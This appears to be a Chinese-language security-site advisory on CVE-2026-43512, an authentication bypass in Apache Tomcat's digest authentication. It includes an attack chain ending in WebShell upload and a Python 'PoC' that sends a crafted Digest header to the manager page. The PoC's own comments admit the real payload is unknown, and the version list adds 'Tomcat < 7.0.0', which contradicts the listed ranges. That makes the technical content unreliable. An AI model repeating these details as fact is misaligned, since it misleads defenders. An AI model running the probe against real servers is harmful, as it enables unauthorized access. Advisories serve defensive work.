CVE-2026-43512 CVSS 9.8 严重

CVE-2026-43512 Apache Tomcat认证绕过漏洞

披露日期: 2026-05-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-43512

漏洞类型

认证绕过

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Apache Tomcat

漏洞概述

Apache Tomcat是一款流行的开源Java Servlet容器。CVE-2026-43512是一个存在于Apache Tomcat摘要认证机制中的严重安全漏洞。该漏洞影响了多个大版本的Tomcat，包括11.0.0-M1至11.0.21、10.1.0-M1至10.1.54、9.0.0.M1至9.0.117以及8.5.0至8.5.100。由于认证逻辑存在缺陷，未经身份验证的远程攻击者无需有效用户凭证即可绕过安全验证，直接访问受保护的Web应用程序资源。该漏洞CVSS v3.1评分为9.8，可能导致敏感数据泄露、数据完整性受损及服务中断。官方已发布修复版本，建议受影响用户尽快升级。

技术细节

该漏洞的核心在于Apache Tomcat处理HTTP摘要认证时的逻辑缺陷。摘要认证旨在通过质询-响应机制验证用户身份，避免密码明文传输。然而，在受影响版本中，Tomcat未能严格验证摘要响应的所有关键字段（如nonce、uri或response计算逻辑），导致攻击者能够构造特制的HTTP请求包。攻击者无需掌握用户密码，只需操纵Authorization头部中的特定参数或利用校验逻辑的漏洞，即可欺骗服务器认为请求已通过认证。由于攻击向量为网络（AV:N），且无需用户交互（UI:N）和前置权限（PR:N），攻击者可轻易利用此漏洞。一旦绕过认证，攻击者可获得应用程序上下文权限，进而可能导致远程代码执行或敏感信息窃取。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别运行Apache Tomcat的服务器，并通过HTTP响应头或错误页面确认其具体版本。

STEP 2

2. 漏洞探测

确认目标版本处于受影响范围内（如11.0.0-M1至11.0.21等），并检测是否启用了摘要认证。

STEP 3

3. 漏洞利用

攻击者向受保护的资源发送特制的HTTP请求，操纵摘要认证头部字段以绕过服务器的身份验证逻辑。

STEP 4

4. 后渗透攻击

成功绕过认证后，攻击者访问管理后台或敏感Web接口，上传WebShell、窃取配置数据或执行系统命令。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (A protected resource requiring Digest Auth)
target_url = "http://target-tomcat:8080/manager/html"

# In a real digest auth bypass scenario, the specific manipulation depends on the bug.
# This PoC demonstrates attempting to access a resource without valid credentials
# or with a malformed Authorization header to trigger the bypass.

headers = {
    # Attempting to bypass by sending a malformed or crafted Authorization header
    # The exact payload depends on the specific vulnerability details.
    "Authorization": "Digest username=\"admin\", realm=\"Tomcat Manager Application\", nonce=\"\", uri=\"/manager/html\", response=\"\""
}

try:
    response = requests.get(target_url, headers=headers, timeout=5)
    if response.status_code == 200:
        print("[+] Potential Bypass Successful! Resource accessed.")
        print("[+] Response Body:")
        print(response.text[:500])
    else:
        print(f"[-] Bypass Failed. Status Code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Apache Tomcat 11.0.0-M1 - 11.0.21

Apache Tomcat 10.1.0-M1 - 10.1.54

Apache Tomcat 9.0.0.M1 - 9.0.117

Apache Tomcat 8.5.0 - 8.5.100

Apache Tomcat < 7.0.0

防御指南

临时缓解措施

建议管理员立即核实当前运行的Apache Tomcat版本。如果无法立即进行升级，应在应用配置中禁用摘要认证，改用Basic Auth（需配合TLS）或其他强认证机制。同时，通过防火墙或安全组限制对Tomcat管理端口（默认8080/8443）的访问，仅允许可信的内部IP地址连接，以减少潜在攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表